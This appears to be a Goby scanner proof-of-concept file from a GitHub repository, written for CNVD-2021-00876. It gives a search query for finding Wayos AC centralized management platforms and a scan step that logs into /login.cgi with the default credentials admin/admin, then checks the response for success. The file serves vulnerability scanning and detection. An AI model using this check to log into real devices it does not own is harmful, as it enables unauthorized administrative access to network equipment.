-
Notifications
You must be signed in to change notification settings - Fork 8
/
Wayos_AC_Centralized_management_system_Default_weak_password.json
55 lines (55 loc) · 2.4 KB
/
Wayos_AC_Centralized_management_system_Default_weak_password.json
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
{
"Name": "Wayos AC Centralized management system Default weak password (CNVD-2021-00876)",
"Level": "2",
"Tags": [
"Default weak password"
],
"GobyQuery": "title=\"AC集中管理平台\" && body=\"login_25.jpg\"",
"Description": "Shenzhen Weimeng Technology Co., Ltd. is a leading network equipment and smart home product solution provider in China. Its main products include wireless gateway, switch, foreign VPN, dual band top-down AP, etc.\n\n\n\nWeak password vulnerability exists in AC centralized management platform, which can be used by attackers to obtain sensitive information.",
"Product": "Wayos AC Centralized management system",
"Homepage": "http://www.wayos.com/",
"Author": "PeiQi",
"Impact": "<p>An attacker can use this vulnerability to obtain sensitive information.<br></p>",
"Recommandation": "",
"References": [
"http://wiki.peiqi.tech"
],
"ScanSteps": [
"AND",
{
"Request": {
"method": "POST",
"uri": "/login.cgi",
"follow_redirect": true,
"header": {
"Content-Type": "application/x-www-form-urlencoded"
},
"data_type": "text",
"data": "user=admin&password=admin"
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "not contains",
"value": "flag=0",
"bz": ""
}
]
},
"SetVariable": []
}
],
"PostTime": "2021-04-04 22:08:56",
"GobyVersion": "1.8.255"
}